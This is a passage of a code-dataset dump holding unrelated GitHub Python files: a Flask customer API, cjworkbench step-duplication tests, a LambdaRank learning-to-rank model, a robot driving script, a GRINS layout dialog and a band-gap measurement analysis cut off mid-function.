load.\\n\"\n","repo_name":"jodiefostersarmy/T2A3","sub_path":"src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5094508852","text":"from flask import Flask, render_template, jsonify, request\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\nimport os\n\napp = Flask(__name__)\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'customer.sqlite')\ndb = SQLAlchemy(app)\nma = Marshmallow(app)\n\n\nclass Customer(db.Model):\n    id = db.Column(db.Integer, primary_key=True)\n    fname = db.Column(db.String(50), unique=False)\n    lname = 
db.Column(db.String(50), unique=False)\n    \n    def __init__(self, fname, lname):\n        self.fname = fname\n        self.lname = lname\n    \nclass CustomerSchema(ma.Schema):\n    class Meta:\n        fields = ('fname', 'lname')\n    \ncustomer_schema=CustomerSchema()\ncustomers_schema=CustomerSchema(many=True)\n\n\n@app.route('/people')\ndef home():\n    return render_template('index.html')\n\n@app.route('/customer', methods=[\"POST\"])\ndef add_customer():\n    fname = request.json['fname']\n    lname = request.json['lname']\n    \n    new_customer = Customer(fname, lname)\n    db.session.add(new_customer)\n    db.session.commit()\n    customer = Customer.query.get(new_customer.id)\n    return customer_schema.jsonify(customer)\n\n@app.route('/customers', methods=[\"GET\"])\ndef get_peoples():\n    all_customers = Customer.query.all()\n    results = customers_schema.dump(all_customers)\n    return jsonify(results)\n\n@app.route('/', methods=[\"GET\"])\ndef get_customers():\n    all_customers = Customer.query.all()\n    results = customers_schema.dump(all_customers)\n    return render_template('index.html', results=results)\n\nif __name__ == '__main__':\n    app.run(debug=True)\n    \n    \n\n","repo_name":"RafaSadiq/Full-Stack-Projects","sub_path":"game/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17484624499","text":"import datetime\nimport uuid as uuidgen\n\nfrom cjwkernel.util import tempfile_context\nfrom cjwstate import s3\nfrom cjwstate.storedobjects import create_stored_object\nfrom cjwstate.models import Workflow\nfrom cjwstate.tests.utils import DbTestCase, get_s3_object_with_data\n\n\n# Set up a simple pipeline on test data\nclass StepTests(DbTestCase):\n    def test_step_duplicate(self):\n        workflow = Workflow.create_and_init()\n        step1 = workflow.tabs.first().steps.create(order=0, slug=\"step-1\")\n\n        # store data to test that it is duplicated\n        with tempfile_context() as path1:\n            path1.write_bytes(b\"12345\")\n            create_stored_object(workflow.id, step1.id, path1)\n        with tempfile_context() as path2:\n            path2.write_bytes(b\"23456\")\n            so2 = create_stored_object(workflow.id, step1.id, path2)\n        step1.secrets = {\"do not copy\": {\"name\": \"evil\", \"secret\": \"evil\"}}\n        step1.stored_data_version = so2.stored_at\n        step1.save(update_fields=[\"stored_data_version\"])\n\n        # duplicate into another workflow, as we would do when duplicating a workflow\n        workflow2 = Workflow.create_and_init()\n        tab2 = workflow2.tabs.first()\n        step1d = step1.duplicate_into_new_workflow(tab2)\n        step1d.refresh_from_db() # test what we actually have in the db\n\n        self.assertEqual(step1d.slug, \"step-1\")\n        self.assertEqual(step1d.workflow, workflow2)\n        self.assertEqual(step1d.module_id_name, step1.module_id_name)\n        self.assertEqual(step1d.order, step1.order)\n        self.assertEqual(step1d.notes, step1.notes)\n        self.assertEqual(step1d.last_update_check, step1.last_update_check)\n        self.assertEqual(step1d.is_collapsed, step1.is_collapsed)\n        self.assertEqual(step1d.params, step1.params)\n        self.assertEqual(step1d.secrets, {})\n\n        # Stored data should contain a clone of content only, not complete version history\n        self.assertEqual(step1d.stored_objects.count(), 1)\n        self.assertEqual(step1d.stored_data_version, step1.stored_data_version)\n        so2d = step1d.stored_objects.first()\n        # The StoredObject was copied byte for byte into a different file\n        self.assertNotEqual(so2d.key, so2.key)\n        self.assertEqual(\n            get_s3_object_with_data(s3.StoredObjectsBucket, so2d.key)[\"Body\"],\n            
get_s3_object_with_data(s3.StoredObjectsBucket, so2.key)[\"Body\"],\n )\n\n def test_step_duplicate_disable_auto_update(self):\n # Duplicates should be lightweight by default: no auto-updating.\n workflow = Workflow.create_and_init()\n tab = workflow.tabs.first()\n step = tab.steps.create(\n order=0,\n slug=\"step-1\",\n auto_update_data=True,\n next_update=datetime.datetime.now(),\n update_interval=600,\n )\n\n workflow2 = Workflow.create_and_init()\n tab2 = workflow2.tabs.create(position=0)\n step2 = step.duplicate_into_new_workflow(tab2)\n\n self.assertEqual(step2.auto_update_data, False)\n self.assertIsNone(step2.next_update)\n self.assertEqual(step2.update_interval, 600)\n\n def test_step_duplicate_clear_secrets(self):\n # Duplicates get new owners, so they should not copy secrets.\n workflow = Workflow.create_and_init()\n tab = workflow.tabs.first()\n step = tab.steps.create(\n order=0, slug=\"step-1\", secrets={\"auth\": {\"name\": \"x\", \"secret\": \"y\"}}\n )\n\n workflow2 = Workflow.create_and_init()\n tab2 = workflow2.tabs.first()\n step2 = step.duplicate_into_new_workflow(tab2)\n\n self.assertEqual(step2.secrets, {})\n\n def test_step_duplicate_copy_uploaded_file(self):\n workflow = Workflow.create_and_init()\n tab = workflow.tabs.first()\n step = tab.steps.create(order=0, slug=\"step-1\", module_id_name=\"upload\")\n uuid = str(uuidgen.uuid4())\n key = f\"{step.uploaded_file_prefix}{uuid}.csv\"\n s3.put_bytes(s3.UserFilesBucket, key, b\"1234567\")\n # Write the uuid to the old module -- we'll check the new module points\n # to a valid file\n step.params = {\"file\": uuid, \"has_header\": True}\n step.save(update_fields=[\"params\"])\n uploaded_file = step.uploaded_files.create(\n name=\"t.csv\", uuid=uuid, key=key, size=7\n )\n\n workflow2 = Workflow.create_and_init()\n tab2 = workflow2.tabs.first()\n step2 = step.duplicate_into_new_workflow(tab2)\n\n uploaded_file2 = step2.uploaded_files.first()\n self.assertIsNotNone(uploaded_file2)\n # New file gets same uuid -- because it's the same file and we don't\n # want to edit params during copy\n self.assertEqual(uploaded_file2.uuid, uuid)\n self.assertEqual(step2.params[\"file\"], uuid)\n self.assertTrue(\n # The new file should be in a different path\n uploaded_file2.key.startswith(step2.uploaded_file_prefix)\n )\n self.assertEqual(uploaded_file2.name, \"t.csv\")\n self.assertEqual(uploaded_file2.size, 7)\n self.assertEqual(uploaded_file2.created_at, uploaded_file.created_at)\n self.assertEqual(\n get_s3_object_with_data(s3.UserFilesBucket, uploaded_file2.key)[\"Body\"],\n b\"1234567\",\n )\n\n def test_step_duplicate_copy_only_selected_uploaded_file(self):\n workflow = Workflow.create_and_init()\n tab = workflow.tabs.first()\n step = tab.steps.create(order=0, slug=\"step-1\", module_id_name=\"upload\")\n uuid1 = str(uuidgen.uuid4())\n key1 = f\"{step.uploaded_file_prefix}{uuid1}.csv\"\n s3.put_bytes(s3.UserFilesBucket, key1, b\"1234567\")\n uuid2 = str(uuidgen.uuid4())\n key2 = f\"{step.uploaded_file_prefix}{uuid2}.csv\"\n s3.put_bytes(s3.UserFilesBucket, key2, b\"7654321\")\n uuid3 = str(uuidgen.uuid4())\n key3 = f\"{step.uploaded_file_prefix}{uuid3}.csv\"\n s3.put_bytes(s3.UserFilesBucket, key3, b\"9999999\")\n step.uploaded_files.create(name=\"t1.csv\", uuid=uuid1, key=key1, size=7)\n step.uploaded_files.create(name=\"t2.csv\", uuid=uuid2, key=key2, size=7)\n step.uploaded_files.create(name=\"t3.csv\", uuid=uuid3, key=key3, size=7)\n # Write the _middle_ uuid to the old module -- proving that we aren't\n # selecting by 
ordering\n step.params = {\"file\": uuid2, \"has_header\": True}\n step.save(update_fields=[\"params\"])\n\n workflow2 = Workflow.create_and_init()\n tab2 = workflow2.tabs.first()\n step2 = step.duplicate_into_new_workflow(tab2)\n\n self.assertEqual(step2.uploaded_files.count(), 1)\n new_uf = step2.uploaded_files.first()\n self.assertEqual(new_uf.uuid, uuid2)\n\n def test_delete_remove_uploaded_data_by_prefix_in_case_model_missing(self):\n workflow = Workflow.create_and_init()\n step = workflow.tabs.first().steps.create(order=0, slug=\"step-1\")\n uuid = str(uuidgen.uuid4())\n key = step.uploaded_file_prefix + uuid\n s3.put_bytes(s3.UserFilesBucket, key, b\"A\\n1\")\n # Don't create the UploadedFile. Simulates races during upload/delete\n # that could write a file on S3 but not in our database.\n # step.uploaded_files.create(name='t.csv', size=3, uuid=uuid, key=key)\n step.delete() # do not crash\n self.assertFalse(s3.exists(s3.UserFilesBucket, key))\n","repo_name":"CJWorkbench/cjworkbench","sub_path":"cjwstate/tests/models/test_step.py","file_name":"test_step.py","file_ext":"py","file_size_in_byte":7415,"program_lang":"python","lang":"en","doc_type":"code","stars":297,"dataset":"github-code","pt":"48"} +{"seq_id":"9897549499","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Description\nChristopher J.C. Burges, Robert Ragno, and Quoc Viet Le. 2006.\nLearning to Rank with Nonsmooth Cost Functions. In Proceedings of NIPS conference. 193–200.\n\"\"\"\n\nimport torch\nimport torch.nn.functional as F\n\nfrom ptranking.base.ranker import NeuralRanker\nfrom ptranking.data.data_utils import LABEL_TYPE\nfrom ptranking.metric.metric_utils import get_delta_ndcg\nfrom ptranking.ltr_adhoc.eval.parameter import ModelParameter\n\nclass LambdaRank(NeuralRanker):\n '''\n Christopher J.C. Burges, Robert Ragno, and Quoc Viet Le. 2006.\n Learning to Rank with Nonsmooth Cost Functions. In Proceedings of NIPS conference. 193–200.\n '''\n def __init__(self, sf_para_dict=None, model_para_dict=None, gpu=False, device=None,\n opt='Adam', lr = 1e-3, weight_decay=1e-3):\n super(LambdaRank, self).__init__(id='LambdaRank', sf_para_dict=sf_para_dict, gpu=gpu, device=device,\n opt=opt, lr = lr, weight_decay=weight_decay)\n self.sigma = model_para_dict['sigma']\n\n def inner_train(self, batch_preds, batch_stds, **kwargs):\n '''\n :param batch_preds: [batch, ranking_size] each row represents the relevance predictions for documents within a ltr_adhoc\n :param batch_stds: [batch, ranking_size] each row represents the standard relevance grades for documents within a ltr_adhoc\n '''\n label_type = kwargs['label_type']\n assert LABEL_TYPE.MultiLabel == label_type\n assert 'presort' in kwargs and kwargs['presort'] is True # aiming for direct usage of ideal ranking\n\n batch_preds_sorted, batch_preds_sorted_inds = torch.sort(batch_preds, dim=1, descending=True) # sort documents according to the predicted relevance\n batch_stds_sorted_via_preds = torch.gather(batch_stds, dim=1, index=batch_preds_sorted_inds) # reorder batch_stds correspondingly so as to make it consistent. 
BTW, batch_stds[batch_preds_sorted_inds] only works with 1-D tensor\n\n batch_std_diffs = torch.unsqueeze(batch_stds_sorted_via_preds, dim=2) - torch.unsqueeze(batch_stds_sorted_via_preds, dim=1) # standard pairwise differences, i.e., S_{ij}\n batch_std_Sij = torch.clamp(batch_std_diffs, min=-1.0, max=1.0) # ensuring S_{ij} \\in {-1, 0, 1}\n batch_std_p_ij = 0.5 * (1.0 + batch_std_Sij)\n\n batch_s_ij = torch.unsqueeze(batch_preds_sorted, dim=2) - torch.unsqueeze(batch_preds_sorted, dim=1) # computing pairwise differences, i.e., s_i - s_j\n batch_p_ij = 1.0 / (torch.exp(-self.sigma * batch_s_ij) + 1.0)\n\n batch_delta_ndcg = get_delta_ndcg(batch_ideally_sorted_stds=batch_stds, batch_stds_sorted_via_preds=batch_stds_sorted_via_preds, label_type=label_type, gpu=self.gpu)\n\n # about reduction, mean leads to poor performance, a probable reason is that the small values due to * lambda_weight * mean\n batch_loss = F.binary_cross_entropy(input=torch.triu(batch_p_ij, diagonal=1),\n target=torch.triu(batch_std_p_ij, diagonal=1),\n weight=torch.triu(batch_delta_ndcg, diagonal=1), reduction='sum')\n self.optimizer.zero_grad()\n batch_loss.backward()\n self.optimizer.step()\n\n return batch_loss\n\n\n###### Parameter of LambdaRank ######\n\nclass LambdaRankParameter(ModelParameter):\n ''' Parameter class for LambdaRank '''\n def __init__(self, debug=False, para_json=None):\n super(LambdaRankParameter, self).__init__(model_id='LambdaRank', para_json=para_json)\n self.debug = debug\n\n def default_para_dict(self):\n \"\"\"\n Default parameter setting for LambdaRank\n :return:\n \"\"\"\n self.lambda_para_dict = dict(model_id=self.model_id, sigma=1.0)\n return self.lambda_para_dict\n\n def to_para_string(self, log=False, given_para_dict=None):\n \"\"\"\n String identifier of parameters\n :param log:\n :param given_para_dict: a given dict, which is used for maximum setting w.r.t. 
grid-search\n        :return:\n        \"\"\"\n        # using specified para-dict or inner para-dict\n        lambda_para_dict = given_para_dict if given_para_dict is not None else self.lambda_para_dict\n\n        s1, s2 = (':', '\\n') if log else ('_', '_')\n        lambdarank_para_str = s1.join(['Sigma', '{:,g}'.format(lambda_para_dict['sigma'])])\n        return lambdarank_para_str\n\n    def grid_search(self):\n        \"\"\"\n        Iterator of parameter settings for LambdaRank\n        \"\"\"\n        if self.use_json:\n            choice_sigma = self.json_dict['sigma']\n        else:\n            choice_sigma = [5.0, 1.0] if self.debug else [1.0] # 1.0, 10.0, 50.0, 100.0\n\n        for sigma in choice_sigma:\n            self.lambda_para_dict = dict(model_id=self.model_id, sigma=sigma)\n            yield self.lambda_para_dict\n","repo_name":"SprocketLab/universalizing-weak-supervision","sub_path":"code/ptranking/ptranking/ltr_adhoc/listwise/lambdarank.py","file_name":"lambdarank.py","file_ext":"py","file_size_in_byte":4895,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"11331733761","text":"\"\"\"\nSet and dict implement hashing \nset is used when we have a collection of keys\ndict when we have key value pairs\n\nUseful when we wish to have fast search, insert and delete (all three operations are O(1))\n\"\"\"\n\n#set\nsetExample={\"test1\",\"test2\",\"Test3\"}\n\nsetExample.add(\"test4\")\nprint(setExample)","repo_name":"DwijanX/ConcursoPrograUsingPythonPractice","sub_path":"Python Libs/Hashing.py","file_name":"Hashing.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42250739105","text":"import math\r\nimport time\r\nfrom sr.robot import *\r\nR = Robot()\r\n\r\n\r\ndef drive(dist=0, angle=0, _time=0): # dir in degrees\r\n    if angle != 0:\r\n        R.motors[0].m0.power = (120 * int(angle < 0)) - 60\r\n        R.motors[0].m1.power = (120 * int(angle > 0)) - 60\r\n        time.sleep(abs(angle) / rot_speed)\r\n        R.motors[0].m0.power = 0\r\n        R.motors[0].m1.power = 0\r\n    if dist != 0:\r\n        R.motors[0].m0.power = 60\r\n        R.motors[0].m1.power = 60\r\n        time.sleep(dist / 0.91) # time = distance / speed\r\n        R.motors[0].m0.power = 0\r\n        R.motors[0].m1.power = 0\r\n    elif _time != 0:\r\n        R.motors[0].m0.power = 60\r\n        R.motors[0].m1.power = 60\r\n        time.sleep(_time)\r\n        R.motors[0].m0.power = 0\r\n        R.motors[0].m1.power = 0\r\n\r\n\r\nwhile True:\r\n    circumference = ((analogRead(4) * (20.0/16384.0)) + 20) * math.pi # c=pi*d\r\n    rot_time = circumference / 0.91 # circumference / speed of wheels = circumferences per sec\r\n    rot_speed = 360 / rot_time # degrees per second\r\n\r\n    markers = R.see(res=(1296, 736))\r\n    if len(markers) > 0:\r\n        drive(dist=markers[0].dist, angle=markers[0].rot_y)\r\n","repo_name":"tpoomlmly/robocon","sub_path":"test scripts/drive to cube.py","file_name":"drive to cube.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19191461842","text":"__version__ = \"$Id$\"\n\n# @win32doc|LayoutViewDialog\n# This class represents the interface between the LayoutView platform independent\n# class and its implementation class _LayoutView in lib/win32/_LayoutView.py which\n# implements the actual view.\n\nimport windowinterface\nfrom usercmd import *\nIMPL_AS_FORM=1\n\nclass LayoutViewDialog:\n    def __init__(self):\n        self.__window=None\n\n    def createviewobj(self):\n        f=self.toplevel.window\n\n        w=f.newviewobj('lview_')\n\n        self.__layoutlist=w['LayoutList']\n        
self.__layoutlist.setcb((self.__layoutcb, ()))\n\n        self.__channellist=w['ChannelList']\n        self.__channellist.setcb((self.__channelcb, ()))\n\n        self.__otherlist=w['OtherList']\n        self.__otherlist.setcb((self.__othercb, ()))\n\n        self.__window = w\n\n    def destroy(self):\n        if self.__window is None:\n            return\n        if hasattr(self.__window,'_obj_') and self.__window._obj_:\n            self.__window.close()\n        self.__window = None\n        del self.__layoutlist\n        del self.__channellist\n        del self.__otherlist\n\n    def show(self):\n        self.assertwndcreated()\n        self.__window.show()\n\n    def is_showing(self):\n        if self.__window is None:\n            return 0\n        return self.__window.is_showing()\n\n    def hide(self):\n        if self.__window is not None:\n            self.__window.close()\n            self.__window = None\n        f=self.toplevel.window\n        f.set_toggle(LAYOUTVIEW,0)\n\n\n    def assertwndcreated(self):\n        if self.__window is None or not hasattr(self.__window,'GetSafeHwnd'):\n            self.createviewobj()\n        if self.__window.GetSafeHwnd()==0:\n            f=self.toplevel.window\n            if IMPL_AS_FORM: # form\n                f.showview(self.__window,'lview_')\n                self.__window.show()\n            else:# dlgbar\n                self.__window.create(f)\n            f.set_toggle(LAYOUTVIEW,1)\n\n    def setlayoutlist(self, layouts, cur):\n        # the core should be corrected but\n        # in order to proceed let's fill the hole here\n        self.assertwndcreated()\n        if layouts != self.__layoutlist.getlist():\n            self.__layoutlist.delalllistitems()\n            self.__layoutlist.addlistitems(layouts, 0)\n        if cur is not None:\n            self.__layoutlist.selectitem(layouts.index(cur))\n        else:\n            self.__layoutlist.selectitem(None)\n\n    def setchannellist(self, channels, cur):\n        if channels != self.__channellist.getlist():\n            self.__channellist.delalllistitems()\n            self.__channellist.addlistitems(channels, 0)\n        if cur is not None:\n            self.__channellist.selectitem(channels.index(cur))\n        else:\n            self.__channellist.selectitem(None)\n\n    def setotherlist(self, channels, cur):\n        if channels != self.__otherlist.getlist():\n            self.__otherlist.delalllistitems()\n            self.__otherlist.addlistitems(channels, 0)\n        if cur is not None:\n            self.__otherlist.selectitem(channels.index(cur))\n\n    def layoutname(self):\n        return self.__layoutlist.getselection()\n\n    def __layoutcb(self):\n        sel = self.__layoutlist.getselected()\n        if sel is None:\n            self.curlayout = None\n        else:\n            self.curlayout = self.__layoutlist.getlistitem(sel)\n        self.fill()\n\n    def __channelcb(self):\n        sel = self.__channellist.getselected()\n        if sel is None:\n            self.curchannel = None\n        else:\n            self.curchannel = self.__channellist.getlistitem(sel)\n        self.fill()\n\n    def __othercb(self):\n        sel = self.__otherlist.getselected()\n        if sel is None:\n            self.curother = None\n        else:\n            self.curother = self.__otherlist.getlistitem(sel)\n        self.fill()\n\n    def setwaiting(self):\n        windowinterface.setwaiting()\n\n    def setready(self):\n        windowinterface.setready()\n\n    def setcommandlist(self, commandlist):\n        self.__window.set_commandlist(commandlist)\n\n    def asklayoutname(self, default):\n        w=windowinterface.LayoutNameDlg('Name for layout',\n                                        default,\n                                        self.newlayout_callback,\n                                        cancelCallback = (self.newlayout_callback, ()),\n                                        parent = self.__window)\n        w.show()\n\n\n    def askchannelnameandtype(self, default, types):\n        w=windowinterface.NewChannelDlg('newchanneldialog',default,grab = 1,\n                                        parent = self.__window)\n        self.__chanwin = w\n        self.__chantext=w._chantext\n        self.__chantype=w._chantype\n        self.__chantype._optionlist=types[:]\n        w._cbd_ok=(self.__okchannel, (1,))\n        w._cbd_cancel=(self.__okchannel, (0,))\n        w.show()\n\n    def __okchannel(self, ok = 0):\n        if ok:\n            name = 
self.__chantext.gettext()\n type = self.__chantype.getvalue()\n else:\n name = type = None\n self.__chanwin.close() # <- end of grab mode\n del self.__chantext\n del self.__chantype\n del self.__chanwin\n apply(apply,(self.newchannel_callback, (name, type)))\n\n # if in grab mode:\n # We can't call this directly since we're still in\n # grab mode. We must first return from this callback\n # before we're out of that mode, so we must schedule a\n # callback in the very near future.\n # windowinterface.settimer(0.00001, (self.newchannel_callback, (name, type)))\n","repo_name":"cwi-dis/grins","sub_path":"mm/editor/win32/LayoutViewDialog.py","file_name":"LayoutViewDialog.py","file_ext":"py","file_size_in_byte":5622,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"1945535530","text":"import numpy as np\nimport pylab as plt\nfrom matplotlib import rcParams\nfrom scipy.optimize import curve_fit\nimport scipy.constants as co\nimport uncertainties as uc\nimport uncertainties.unumpy as un\nfrom scipy.signal import argrelextrema as ext\nimport seaborn as sns\n\nfontsize_labels = 22 # size used in latex document\nrcParams['font.family'] = 'serif'\nrcParams['font.serif'] = ['Computer Modern Roman']\nrcParams['text.usetex'] = True\nrcParams['figure.autolayout'] = True\nrcParams['font.size'] = fontsize_labels\nrcParams['axes.labelsize'] = fontsize_labels\nrcParams['xtick.labelsize'] = fontsize_labels\nrcParams['ytick.labelsize'] = fontsize_labels\nrcParams['legend.fontsize'] = fontsize_labels\nrcParams['figure.figsize'] = (2*6.2, 2*3.83) # in inches; width corresponds to \\textwidth in latex document (golden ratio)\n\nplt.close(\"all\")\nshow_fig = True\nsave_fig = False # see below\nif not save_fig:\n rcParams['figure.figsize'] = (15, 8) # in inches; width corresponds to \\textwidth in latex document (golden ratio)\nsave_coeff = False # do ONLY save, if scipy 0.14. 
is in use...\nfig_dir = \"../figures/\"\nnpy_dir = \"./data_npy/\"\n\n# angle to energy\ndef ang_to_E(alpha, sample_name):\n    deg_to_rad = lambda phi_deg: 2 * np.pi / 360 * phi_deg\n    phi = deg_to_rad(alpha)\n    if sample_name == \"Si\":\n        d = 1 / 1200 / 1000\n    if sample_name == \"Ge\":\n        d = 1 / 600 / 1000\n    psi = deg_to_rad(7.5)\n    E = co.h * co.c / (2 * d * abs(np.sin(phi)) * np.cos(psi))\n    En = E / co.e # Energy in eV\n    return(En)\n\ndef polygon(x_grid, x_arr, y_arr):\n    y_on_grid = x_grid * 0\n    for i, x in enumerate(x_grid):\n        x_less = x_arr < x\n        x1 = x_arr[x_less][-1]\n        y1 = y_arr[x_less][-1]\n        x_greater = x_arr > x\n        x2 = x_arr[x_greater][0]\n        y2 = y_arr[x_greater][0]\n        y_x = (y1 * (x - x1) + y2 * (x2 - x)) / (x2 - x1)\n        y_on_grid[i] = y_x\n    return y_on_grid\n\n\nEs = 4 * [0]\ndEs = np.zeros(4)\nf = open(\"band_gap_results.tex\", \"w+\")\nf.write(\"\\t\\\\begin{tabular}{|p{1.5cm}|p{1.5cm}|p{1.5cm}|p{1.5cm}|p{2cm}|p{2cm}|p{2.7cm}|}\\n\")\nf.write(\"\\t\\t\\hline\\n\")\nf.write(\"\\t\\t\\\\rowcolor{tabcolor}\\n\")\nf.write(\"\\t\\tSample & $\\phi_g / ^\\circ$ & \\n \\\n\\t\\t\\t$\\overline{\\phi_\\mathrm{lower}}/ ^\\circ$ & $\\overline{\\phi_\\mathrm{upper}}/ ^\\circ$ &\\n \\\n\\t\\t\\t$E_\\mathrm{lower}$/ eV & $E_\\mathrm{upper}$/ eV & $E_g$ / eV \\\\\\\\ \\hline\\n\")\nfor sample_name in [\"Si\", \"Ge\"]:\n    fig1, ax1 = plt.subplots(1, 1)\n    if not save_fig:\n        fig1.suptitle(\"Band Gap, Sample: \" + sample_name)\n    for suffix in [\"2\"]:\n        npy_file = npy_dir + \"band_gap_\" + sample_name + \"_\" + suffix + \".npy\"\n        angle, trans, absorp = np.load(npy_file)\n        if angle[0] > 0:\n            angle, trans, absorp = angle[::-1], trans[::-1], absorp[::-1]\n        plot_t, = ax1.plot(angle, trans, '.', alpha=0.8, label=(r'$T_\\mathrm{' + sample_name + r'}$'))\n        next(ax1._get_lines.color_cycle)\n        plot_a, = ax1.plot(angle, absorp, '.', alpha=0.8, label=(r'$A_\\mathrm{' + sample_name + r'}$'))\n        next(ax1._get_lines.color_cycle)\n    for suffix in [\"lamp\"]:\n        npy_file = npy_dir + \"band_gap_\" + sample_name + \"_\" + suffix + \".npy\"\n        angle_lamp, trans_lamp, dummy = np.load(npy_file)\n        if angle_lamp[0] > 0:\n            angle_lamp, trans_lamp = angle_lamp[::-1], trans_lamp[::-1]\n        plot_lamp, = ax1.plot(angle_lamp, trans_lamp, '.', alpha=0.8, label=r'$L$')\n    for suffix in [\"background\"]:\n        npy_file = npy_dir + \"band_gap_\" + sample_name + \"_\" + suffix + \".npy\"\n        angle_bg, trans_bg, absorp_bg = np.load(npy_file)\n        if angle_bg[0] > 0:\n            angle_bg, trans_bg, absorp_bg = angle_bg[::-1], trans_bg[::-1], absorp_bg[::-1]\n    #plot_t_bg, = ax1.plot(angle_bg, trans_bg, '.', alpha=0.8, label=r'$T_\\mathrm{background}$')\n    #plot_a_bg, = ax1.plot(angle_bg, absorp_bg, '.', alpha=0.8, label=r'$A_\\mathrm{background}$')\n    # place a text box in upper left in axes coords\n    props = dict(boxstyle='round', facecolor='white', alpha=0.5)\n    textstr = 'Sample: ' + sample_name\n    ax1 = plt.gca()\n    ax1.text(0.1, 0.95, textstr, transform=ax1.transAxes, va='top', bbox=props)\n    ax1.set_xlim(angle[0], angle[-1])\n    ax1.set_ylim(0, 3)\n    ax1.set_xlabel(\"angle / degrees\")\n    ax1.set_ylabel(\"$U$ / V\")\n    ax1.legend(loc=1)\n    if show_fig:\n        fig1.show()\n    if save_fig:\n        file_name = \"band_gap_raw_\" + sample_name\n        fig1.savefig(fig_dir + file_name + \".pdf\")\n        fig1.savefig(fig_dir + file_name + \".png\")\n\n    #trans_real = (trans - trans_background)/ trans_lamp\n    # the data is not defined on the same array of angles, we need to interpolate onto one grid!\n    # get the ends and length of the grid\n    lower_angle = max(angle[0], 
angle_bg[0], angle_lamp[0])\n    upper_angle = min(angle[-1], angle_bg[-1], angle_lamp[-1])\n    min_len = min(len(np.where((angle > lower_angle) * (angle < upper_angle))[0]),\n                  len(np.where((angle_bg > lower_angle) * (angle_bg < upper_angle))[0]), \n                  len(np.where((angle_lamp > lower_angle) * (angle_lamp < upper_angle))[0]))\n    # create a grid on a subset of the intersection of all three angles intervals\n    x_grid = np.linspace(lower_angle, upper_angle, min_len + 1) # \"+1\" to be able to cut off the edges\n    x_grid = x_grid[1:-1] # cut the edges\n\n    # real transmission and absorption\n    lamp = polygon(x_grid, angle_lamp, trans_lamp)\n\n    t = polygon(x_grid, angle, trans)\n    t_bg = polygon(x_grid, angle_bg, trans_bg)\n    t_real = (t - t_bg) / lamp\n\n    a = polygon(x_grid, angle, absorp)\n    a_bg = polygon(x_grid, angle_bg, absorp_bg)\n    a_real = (a - a_bg) / lamp\n\n    # choosing side\n    for i in range(2):\n        j = i\n        if sample_name == \"Si\":\n            j += 2\n        print(j)\n        side = [\"left\", \"right\", \"left\", \"right\"] # side of the recorded spectrum\n        xlims = [(-40, -25), (25, 40), (-49, -35), (35, 50)] # limits for plotting\n        xlims1 = [(-60, -25), (25, 40), (-49, -35), (35, 50)] # limits for plotting\n        ylims = [(0, 0.6), (0, 1.2), (0, 1.2), (0, 1.2)]\n        fit_ranges_t = [(-34.6, -31.4), (30.0, 34.6), (-43.0, -38.0), (37.0, 43.0)] # data points for interpolation of transmission\n        fit_ranges_a = [(-36.0, -31.9), (31.3, 36.0), (-46.0, -38.0), (38.0, 44.2)] # data points for interpolation of absorption\n        legend_loc = [1, 2, 6, 5] # location of the legend\n        x_hori = [x_grid[x_grid < -30], x_grid[x_grid > 29], \n                  x_grid[x_grid < -37], x_grid[x_grid > 29]][j] # horizontal line should not cross the legend but intersect\n\n        # plotting real transmission and absorption signals\n        fig1, ax1 = plt.subplots(1, 1)\n        if not save_fig:\n            fig1.suptitle(\"Band Gap, Sample: \" + sample_name + \", \" + side[j])\n        ax1.plot(x_grid, t_real, '.', c=plot_t.get_color(), alpha=0.8, label=(r'$T_\\mathrm{' + sample_name + r', corrected}$'))\n        ax1.plot(x_grid, a_real, '.', c=plot_a.get_color(), alpha=0.8, label=(r'$A_\\mathrm{' + sample_name + r', corrected}$'))\n        ax1.set_xlim(xlims1[j])\n        ax1.set_ylim(ylims[j])\n        ax1.set_xlabel(\"angle / degrees\")\n        ax1.set_ylabel(\"$U$ / V\")\n        ax1.legend(loc=1)\n        if show_fig:\n            fig1.show()\n        if save_fig:\n            file_name = \"band_gap_detail_\" + sample_name + \"_\" + side[j]\n            fig1.savefig(fig_dir + file_name + \".pdf\")\n            fig1.savefig(fig_dir + file_name + \".png\")\n\n        # do the interpolation!\n        # normalizing\n        max_t = max(t_real[(x_grid > xlims[j][0]) * (x_grid < xlims[j][1])])\n        t_real = t_real / max_t\n        max_a = max(a_real[(x_grid > xlims[j][0]) * (x_grid < xlims[j][1])])\n        a_real = a_real / max_a\n        # linear fit\n        # Transmission\n        fit_range_t = fit_ranges_t[j]\n        index_fit = (x_grid > fit_range_t[0]) * (x_grid < fit_range_t[1])\n        alpha_fit_t = x_grid[index_fit]\n        t_fit = t_real[index_fit]\n        x_borders_t = alpha_fit_t[[0, -1]]\n        t_borders = t_fit[[0, -1]]\n        def t_func(alpha, a, b):\n            return a * alpha + b\n        t_c, t_cov = curve_fit(t_func, alpha_fit_t, t_fit, p0=None) #, sigma=t_std_dev)#, absolute_sigma=True) # this will not work for scipy 0.13.\n        t_uc = uc.correlated_values(t_c, t_cov)\n\n        # Absorption\n        fit_range_a = fit_ranges_a[j]\n        index_fit = (x_grid > fit_range_a[0]) * (x_grid < fit_range_a[1])\n        alpha_fit_a = x_grid[index_fit]\n        a_fit = a_real[index_fit]\n        x_borders_a = alpha_fit_a[[0, -1]]\n        a_borders = a_fit[[0, -1]]\n        min_a = min(a_real[(x_grid > xlims[j][0]) * (x_grid < xlims[j][1])])\n        def a_func(alpha, a, b):\n            
